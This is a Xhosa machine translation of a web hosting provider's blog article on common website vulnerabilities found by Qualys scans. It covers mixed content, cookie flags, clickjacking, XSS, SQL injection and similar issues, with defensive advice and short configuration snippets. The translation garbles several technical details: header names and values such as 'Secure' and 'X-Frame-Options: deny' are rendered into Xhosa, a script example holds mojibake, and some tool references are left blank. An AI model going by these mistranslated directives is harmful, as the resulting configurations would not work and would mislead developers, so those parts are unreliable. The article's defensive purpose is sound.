Malunga nonyaka odlulileyo, thina kwiDathaLine sasungulwa ukukhangela kunye nokuhlalutya ubuthathaka kwizicelo ze-IT. Inkonzo isekelwe kwisisombululo sefu se-Qualys, malunga nokusebenza kwayo . Ngokuhamba konyaka wokusebenza kunye nesisombululo, senze i-291 scans kwiindawo ezahlukeneyo kunye nezibalo eziqokelelweyo malunga nobuthathaka obuqhelekileyo kwizicelo zewebhu.
Kwinqaku elingezantsi ndiza kukubonisa ngokuthe ngqo ukuba yeyiphi imingxuma ekukhuselweni kwewebhusayithi efihliweyo ngamanqanaba ahlukeneyo okubaluleka. Makhe sibone ukuba loluphi ubuthathaka olufunyenwe sisikena rhoqo, kutheni lunokwenzeka, kunye nokuzikhusela.
I-Qualys yahlula bonke ubuthathaka besicelo sewebhu kumanqanaba amathathu okubaluleka: okuphantsi, okuphakathi kunye nokuphezulu. Ukuba ujonga ukusabalalisa "ngobunzima", kubonakala ngathi yonke into ayibi kakhulu. Kukho ubuthathaka obumbalwa obunomgangatho ophezulu wokugxeka, ubukhulu becala zonke azibalulekanga:
Kodwa ukungagxeki akuthethi ukungabi nabungozi. Zisenokubangela umonakalo omkhulu.
Top "non-critical" semngciphekweni
- Ubuthathaka bomxholo oxutyiweyo.
Umgangatho wokhuseleko lwewebhusayithi kukudluliselwa kwedatha phakathi komxhasi kunye nomncedisi ngeprotocol yeHTTPS, exhasa ukubethelwa kunye nokukhusela ulwazi ekuthinteleni.
Ezinye iisayithi zisebenzisa umxholo oxutyiweyo: Enye idatha idluliswa ngeprotocol yeHTTP engakhuselekanga. Le yeyona ndlela idla ngokugqithiswa ngayo umxholo wokwenziwa β ulwazi oluchaphazela kuphela umboniso wesiza: imifanekiso, izimbo zecss. Kodwa ngamanye amaxesha le yindlela esasazwa ngayo umxholo osebenzayo: izikripthi ezilawula ukuziphatha kwendawo. Kule meko, usebenzisa isofthiwe ekhethekileyo, unokuhlalutya ulwazi olunomxholo osebenzayo ovela kumncedisi, uguqule iimpendulo zakho kwi-fly kwaye wenze umatshini usebenze ngendlela engazange ijongwe ngabadali bayo.
Iinguqulelo ezitsha zeebhrawuza zilumkisa abasebenzisi ukuba iisayithi ezinomxholo oxutyiweyo azikhuselekanga kwaye zivimba umxholo. Abaphuhlisi bewebhusayithi nabo bafumana izilumkiso zesikhangeli kwikhonsoli. Ngokomzekelo, le yindlela ekhangeleka ngayo :
Yintoni eyingozi: Abahlaseli basebenzisa iprotocol engakhuselekanga ukuze bathintele ulwazi lomsebenzisi, batshintshe izikripthi kwaye bathumele izicelo kwisayithi egameni lakhe. Nokuba umtyeleli wesiza akazange afake idatha, oku akumkhuseli kuyo phishing β ukufumana ulwazi oluyimfihlo usebenzisa iindlela zobuqhophololo. Umzekelo, usebenzisa iskripthi, ungathumela kwakhona umsebenzisi kwindawo engakhuselekanga ezenza umntu oqhelekileyo kumsebenzisi. Kwezinye iimeko, indawo enobungozi ibonakala ibhetele ngakumbi kuneyokuqala, kwaye umsebenzisi unokuzalisa ifomu ngokwakhe kwaye angenise idatha eyimfihlo.Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Nokuba umlawuli wesiza ufake kwaye uqwalasele isatifikethi se-SSL/TLS, ubuthathaka bunokuvela ngenxa yempazamo yomntu. Umzekelo, ukuba kwelinye lamaphepha awubekanga ikhonkco elizalanayo, kodwa ikhonkco elipheleleyo elisuka ku-http, kwaye ukongeza awuzange umise ukuhanjiswa ukusuka ku-http ukuya ku-https.
Unokubona umxholo oxubileyo kwindawo usebenzisa isikhangeli: khangela ikhowudi yomthombo wephepha, funda izaziso kwi-console yonjiniyela. Nangona kunjalo, umphuhlisi kuya kufuneka afake ikhowudi ixesha elide kwaye edinayo. Unokuyikhawulezisa inkqubo ngezixhobo zokuhlalutya ezizenzekelayo, umzekelo: , Isoftware yeLighthouse yasimahla okanye isoftwe ehlawulweyo I-Screaming Frog SEO Spider.
Kwakhona, ukuba sesichengeni kunokuvela ngenxa yeengxaki zekhowudi yelifa - ikhowudi efunyenwe njengelifa. Umzekelo, ukuba amanye amaphepha aveliswa kusetyenziswa itemplate endala, engathatheli ngqalelo ukutshintshwa kweesayithi ukuya kwi-https.
- Iikuki ngaphandle kwe "HTTPOnly" kunye neeflegi "ezikhuselekileyo".
Uphawu lwe "HTTPOnly" lukhusela iikuki ekubeni zisetyenzwe zizikripthi ezisetyenziswa ngabahlaseli ukuba iinkcukacha zomsebenzisi. Iflegi "ekhuselekileyo" ayivumeli iicookies ukuba zithunyelwe ngombhalo ocacileyo. Unxibelelwano luya kuvunyelwa kuphela ukuba iprotocol ekhuselekileyo yeHTTPS isetyenziselwa ukuthumela iikuki.
Zombini iimpawu zichaziwe kwiipropati zekuki:
Set-Cookie: Secure; HttpOnlyYintoni eyingozi: Ukuba umphuhlisi wesayithi akakhange azichaze ezi mpawu, umhlaseli angathimba ulwazi lomsebenzisi kwikuki kwaye ayixhaphaze. Ukuba ii-cookies zisetyenziselwa ukuqinisekiswa kunye nokugunyaziswa, uya kukwazi ukuphanga iseshoni yomsebenzisi kwaye enze izenzo kwisayithi egameni lakhe.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Njengomthetho, kwiinkqubo ezidumileyo ezi mpawu zisetwa ngokuzenzekelayo. Kodwa jonga uqwalaselo lomncedisi wewebhu kwaye usete iflegi: Set-Cookie HttpOnly; Khusela.
Kule meko, uphawu "lwe-HTTPOnly" luya kwenza iikuki zingabonakali kwiJavaScript yakho.
- Ubuthathaka obuSekwe kwiNdlela.
Iskena sixela ubuthathaka obunjalo ukuba sifumana ifayile efikelelekayo esidlangalaleni okanye ulawulo lwewebhusayithi olunolwazi olunokubakho oluyimfihlo. Umzekelo, ibona iifayile zoqwalaselo zesixokelelwano okanye ukufikelela kuyo yonke inkqubo yefayile. Le meko inokwenzeka ukuba amalungelo okufikelela abekwe ngokungalunganga kwisiza.
Yintoni eyingozi: Ukuba inkqubo yefayile "iphuma ngaphandle," umhlaseli unokuwela kwi-interface yenkqubo yokusebenza kwaye uzame ukufumana iifolda ezinamagama agqithisiweyo ukuba zigcinwe kwisicatshulwa esicacileyo (musa ukwenza oko!). Okanye ungaba ii-hashes ze-password kwaye unyanzelise igama eliyimfihlo, kwaye uzame ukuphakamisa amalungelo kwisistim kwaye ungene nzulu kwisiseko.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Musa ukulibala malunga namalungelo okufikelela kwaye ulungise iqonga, iseva yewebhu, isicelo sewebhu ukwenzela ukuba akunakwenzeka ukuba "ubaleke" kuluhlu lwewebhu.
- Iifomu zokufaka idatha enovakalelo ngokuzaliswa okuzenzekelayo kuvuliwe.
Ukuba umsebenzisi uhlala egcwalisa iifom kwiiwebhusayithi, isikhangeli sabo sigcina olu lwazi sisebenzisa isici sokuzalisa ngokuzenzekelayo.
Iifomu ezikwiwebhusayithi zinokuquka iindawo ezineenkcukacha ezinovakalelo, ezifana neepassword okanye iinombolo zekhadi letyala. Kwimihlaba enjalo, kufanelekile ukukhubaza umsebenzi wokuzalisa ifom kwisiza ngokwaso.
Yintoni eyingozi: Ukuba isikhangeli somsebenzisi sigcina ulwazi olubuthathaka, umhlaseli angalufumana kamva, umzekelo ngokwenza i phishing. Ngokwenene, umphuhlisi wewebhu oye walibala malunga nale nuance ubeka abasebenzisi bakhe.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Kule meko, sinongquzulwano lwakudala: lula vs ukhuseleko. Ukuba umphuhlisi wewebhu ucinga ngamava omsebenzisi, unokukhetha ngokuzikhethela ukugqibezela. Umzekelo, ukuba kubalulekile ukulandela β iingcebiso zokufikeleleka komxholo kubasebenzisi abakhubazekileyo.
Kwiibhrawuza ezininzi, unokuvala ukugqibezela ngokuzenzekelayo nge-autocompete="off" uphawu, umzekelo:
<body> <form action="/xh/form/submit" method="get" autocomplete="off"> <div> <input type="text" placeholder="First Name"> </div> <div> <input type="text" id="lname" placeholder="Last Name" autocomplete="on"> </div> <div> <input type="number" placeholder="Credit card number"> </div> <input type="submit"> </form> </body>Kodwa ayizukusebenza kwiChrome. Oku kujikeleziswa kusetyenziswa iJavaScript, ukwahluka kweresiphi inokufumaneka .
- I-header ye-X-Frame-Options ayimiselwanga kwikhowudi yesiza.
Le header ichaphazela isakhelo, iframe, embed, okanye iithegi zento. Ngoncedo lwayo, unokuthintela ngokupheleleyo ukubethelela indawo yakho ngaphakathi kwesakhelo. Ukwenza oku, kufuneka uchaze ixabiso X-Isakhelo-Ukhetho: khanyela. Okanye ungakhankanya uKhetho lwe-X-Isakhelo: sameorigin, emva koko uzinziso kwi-iframe iyakufumaneka kuphela kwindawo yakho.
Yintoni eyingozi: Ukungabikho kwesihloko esinjalo kunokusetyenziswa kwiindawo ezinobungozi ukuya ukucofa. Kolu hlaselo, umhlaseli wenza isakhelo esicacileyo phezu kwamaqhosha kunye namaqhinga omsebenzisi. Umzekelo: abarhwaphilizi baqulunqa amaphepha enethiwekhi yoluntu kwiwebhusayithi. Umsebenzisi ucinga ukuba ucofa iqhosha kule ndawo. Endaweni yoko, ukucofa kuthintelwe kwaye isicelo somsebenzisi sithunyelwa kwinethiwekhi yoluntu apho kukho iseshoni esebenzayo. Le yindlela abahlaseli abathumela ngayo i-spam egameni lomsebenzisi okanye bafumane ababhalisi kunye nezinto abazithandayo.
Ukuba awuliyeki eli nqaku, umhlaseli unokubeka iqhosha lesicelo sakho kwindawo enobungozi. Usenokuba nomdla kwinkqubo yakho yokudlulisela okanye kubasebenzisi bakho.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Ubuthathaka bungenzeka ukuba ii-X-Frame-Options ezinexabiso eliphikisanayo zicwangciswe kumncedisi wewebhu okanye umlinganiselo womthwalo. Kule meko, umncedisi kunye nomlinganisi baya kubhala kwakhona isihloko, kuba banokubaluleka okuphezulu xa kuthelekiswa nekhowudi yangasemva.
Ukukhanyela kunye nemvelaphi efanayo ye-X-Frame-Options header iya kuphazamisa ukusebenza kombukeli wewebhu weYandex. Ukuvumela ukusetyenziswa kwee-iframes zombukeli wewebhu, kufuneka ubhale umthetho owahlukileyo kwizicwangciso. Umzekelo, kwi nginx ungayiqwalasela ngolu hlobo:
http{ ... map $http_referer $frame_options { "~webvisor.com" "ALLOW-FROM http://webvisor.com"; default "SAMEORIGIN"; } add_header X-Frame-Options $frame_options; ... } - PRSSI (Path-relative style sheet import) ubuthathaka.
Oku kubuthathaka kwisitayile sesiza. Iyenzeka ukuba amakhonkco azalanayo afana ne href="/xh/somefolder/styles.css/" asetyenziswa ukufikelela kwiifayile zesimbo. Umhlaseli uya kuthatha ithuba loku ukuba ufumana indlela yokubuyisela umsebenzisi kwiphepha elibi. Iphepha liza kufaka ikhonkco elizalanayo kwi-url yalo kwaye lilinganise umnxeba wesitayile. Uya kufumana isicelo esifana ne-badsite.ru/β¦/somefolder/styles.css/, enokwenza izenzo ezingalunganga phantsi kwesimbo sesimbo.
Yintoni eyingozi: Umkhohlisi unokusebenzisa obu buthathaka ukuba ufumene omnye umngxuma wokhuseleko. Ngenxa yoko, kunokwenzeka ukuba idatha yomsebenzisi kwiikuki okanye iithokheni.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Cwangcisa i-X-Content-Type-Options header ukuya: nosniff. Kule meko, umkhangeli zincwadi uya kujonga uhlobo lomxholo kwiintlobo. Ukuba uhlobo lolunye kunombhalo/css, isikhangeli siya kuvala isicelo.
Ubuthathaka obubalulekileyo
- Iphepha elinomhlaba wegama lokugqitha ligqithiselwa ukusuka kumncedisi ngaphezulu kwetshaneli engakhuselekanga (ifomu yeHTML equlathe indawo yegama lokugqitha inikezelwa ngeHTTP).
Impendulo esuka kumncedisi phezu kwetshaneli engafihlwanga isengozini yokuhlaselwa "Indoda phakathi". Umhlaseli unokunqanda i-traffic kwaye adibanise phakathi komxhasi kunye nomncedisi njengoko iphepha lihamba ukusuka kumncedisi ukuya kumxhasi.
Yintoni eyingozi: Umkhohlisi uya kukwazi ukutshintsha iphepha kwaye athumele umsebenzisi ifom yedatha eyimfihlo, eya kumncedisi womhlaseli.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Ezinye iisayithi zithumela abasebenzisi ikhowudi yexesha elinye nge-imeyile/ngefowuni endaweni yegama eliyimfihlo. Kule meko, ukuba sesichengeni akubalulekanga kangako, kodwa isixhobo siyakwenza nzima ubomi babasebenzisi.
- Ukuthumela ifom nge-login kunye negama lokugqitha kwitshaneli engakhuselekanga (Ifomu yokuNgena ayingeniswanga nge-HTTPS).
Kule meko, ifom enegama lokungena kunye negama lokugqitha ithunyelwa ukusuka kumsebenzisi ukuya kumncedisi ngetshaneli engafihlwanga.
Yintoni eyingozi: Ngokungafaniyo nemeko yangaphambili, oku sele kusemngciphekweni obalulekileyo. Kulula ukuthintela idatha ebuthathaka kuba awudingi nokuba ubhale ikhowudi ukuyenza.
- Ukusebenzisa iilayibrari zeJavaScript ezinobuthathaka obaziwayo.
Ngexesha lokuskena, elona thala lisetyenziswa kakhulu yijQuery enenani elibanzi leenguqulelo. Uguqulelo ngalunye lunobuthathaka obunye, okanye nangaphezulu, obaziwayo. Impembelelo inokwahluka kakhulu ngokuxhomekeke kubume bobuthathaka.
Yintoni eyingozi: Kukho ukuxhaphaka kobuthathaka obaziwayo, umzekelo:
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Buyela rhoqo kumjikelo: khangela ubuthathaka obaziwayo - lungisa - khangela. Ukuba usebenzisa iilayibrari zelifa ngamabomu, umzekelo ukuxhasa iiphequluli ezindala okanye ukugcina imali, khangela ithuba lokulungisa umngcipheko owaziwayo. - Ukubhalwa kwe-Cross-site (XSS).
I-Cross-Site Scripting (XSS), okanye i-cross-site scripting, luhlaselo kwisicelo sewebhu esikhokelela ekubeni i-malware ifakwe kwisiseko sedatha. Ukuba i-Qualys ifumana ubuthathaka obunjalo, oko kuthetha ukuba umhlaseli onokubakho angakwazi okanye sele engenise eyakhe iscript yejs kwikhowudi yesiza ukwenza izenzo ezikhohlakeleyo.I-XSS egciniweyo kuyingozi kakhulu, kuba okushicilelweyo kufakwe kumncedisi kwaye kwenziwa ngalo lonke ixesha iphepha elihlaselweyo livulwa kumkhangeli zincwadi.
I-XSS ebonisiweyo kulula ukuyenza kuba iskripthi esinobungozi sinokutofwa kwisicelo seHTTP. Isicelo siya kufumana isicelo se-HTTP, asiyi kuqinisekisa idatha, siya kuyipakisha, kwaye siyithumele ngokukhawuleza. Ukuba umhlaseli uthintela itrafikhi kwaye ufaka iscript esinje
<script>/*+ΡΡΠΎ+ΡΠΎ+ΠΏΠ»ΠΎΡ ΠΎΠ΅+*/</script>ke isicelo esikhohlakeleyo siya kuthunyelwa egameni lomxhasi.
Umzekelo omangalisayo we-XSS: ii-js sniffers ezilinganisa amaphepha okufaka i-CVC, ixesha lokuphelelwa kwekhadi, njalo njalo.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Kwisihloko soMgaqo-nkqubo woMxholo, sebenzisa uphawu lwe-script-src ukunyanzela isikhangeli somthengi ukuba sikhuphele kuphela kwaye siphumeze ikhowudi kumthombo othembekileyo. Umzekelo, iscript-src 'self' whitelists zonke iiscripts ezisuka kwindawo yethu kuphela.
Olona qheliselo lulungileyo yikhowudi engaphakathi: vumela kuphela i-javascript engaphakathi usebenzisa ixabiso elingakhuselekanga lomgca. Eli xabiso livumela usebenziso lwe-js/css engaphakathi, kodwa ayikuthinteli ukubandakanywa kweefayile ze-js. Ngokudibanisa ne-script-src 'self' sikhubaza izikripthi zangaphandle ekubeni zisetyenziswe.Qinisekisa ukuba ungene kuyo yonke into usebenzisa ingxelo-uri kwaye ujonge kwiinzame zokuyiphumeza kwisiza.
- Iinaliti zeSQL.
Ubuthathaka bubonisa ukuba kunokwenzeka ukufaka ikhowudi ye-SQL kwiwebhusayithi efikelela kwisiseko sedatha yewebhusayithi ngokuthe ngqo. Isitofu se-SQL sinokwenzeka ukuba idatha evela kumsebenzisi ayijongwanga: ayikhangelwa ukuchaneka kwaye isetyenziswe ngokukhawuleza kumbuzo. Ngokomzekelo, oku kwenzeka ukuba ifom kwiwebhusayithi ayikhangeli ukuba igalelo lihambelana nohlobo lwedatha.Yintoni eyingozi: Ukuba umhlaseli ufaka umbuzo weSQL kule fomu, unokuphazamiseka kwisiseko sedatha okanye aveze ulwazi oluyimfihlo.
Yintoni umthuthukisi wewebhu ekufuneka ayikhumbule: Musa ukuthemba into evela kwibrawuza. Kufuneka uzikhusele kwicala lomxhasi kunye necala lomncedisi.
Kwicala lomxhasi, bhala uqinisekiso lwendawo usebenzisa iJavaScript.
Imisebenzi eyakhelwe-ngaphakathi kwizikhokelo ezidumileyo ikwanceda ukubaleka abalinganiswa abarhanelwayo kumncedisi. Kukwacetyiswa ukuba kusetyenziswe imibuzo yedatha yeparameterized kwiseva.
Qinisekisa ukuba unxibelelwano lwedatha lwenzeka phi kwisicelo sewebhu.
Ukusebenzisana kwenzeka xa sifumana naluphi na ulwazi: isicelo kunye nesazisi (utshintsho lwe-id), ukudalwa komsebenzisi omtsha, uluvo olutsha, okanye amangeniso amatsha kuvimba wedatha. Apha kulapho iinaliti zeSQL zingenzeka khona. Nokuba sicima irekhodi kwisiseko sedatha, inaliti yeSQL inokwenzeka.
Iingcebiso eziqhelekileyo
Musa ukuqamba kwakhona ivili - sebenzisa izikhokelo eziqinisekisiweyo. Njengomthetho, izikhokelo ezithandwayo zikhuselekile ngakumbi. Ye-NET - ASP.NET MVC kunye ne-ASP.NET Core, yePython - iDjango okanye iFlask, yeRuby - Ruby kwiRails, ye-PHP - Symfony, Laravel, Yii, yeJavaScript - Node.JS-Express.js, yeJava - Spring MVC.
Landela uhlaziyo lwabathengisi kwaye uhlaziye rhoqo. Baza kufumana ubuthathaka, emva koko babhale i-exploit, benze ukuba kufumaneke esidlangalaleni, kwaye yonke into iya kwenzeka kwakhona. Bhalisela uhlaziyo kwiinguqulelo ezizinzileyo ezivela kumthengisi wesoftware.
Jonga amalungelo okufikelela. Kwicala lomncedisi, hlala uphatha ikhowudi yakho njengokungathi, ukusuka kwiyokuqala ukuya kwileta yokugqibela, yabhalwa lutshaba lwakho oluzondayo, olufuna ukuphula indawo yakho, luphule ingqibelelo yedatha yakho. Ngaphezu koko, ngamanye amaxesha oku kuyinyaniso.
Sebenzisa ii-clones, iisayithi zovavanyo, kwaye emva koko uzisebenzisele imveliso. Oku kuya kunceda, okokuqala, ukuphepha iimpazamo kunye neempazamo kwindawo enemveliso: indawo evelisayo izisa imali, indawo elula yokuvelisa ibalulekile. Xa ukongeza, ukulungisa okanye ukuvala nayiphi na ingxaki, kuyafaneleka ukusebenza kwindawo yokuvavanya, emva koko ujonge ukusebenza kunye nobuthathaka obufunyenweyo, kwaye emva koko uceba ukusebenza kunye nemeko yokuvelisa.
Khusela usetyenziso lwakho lwewebhu nge kwaye udibanise iingxelo ezivela kwiskena sobungozi kunye nayo. Ngokomzekelo, i-DataLine isebenzisa i-Qualys kunye ne-FortiWeb njenge-bundle yeenkonzo.
umthombo: www.habr.com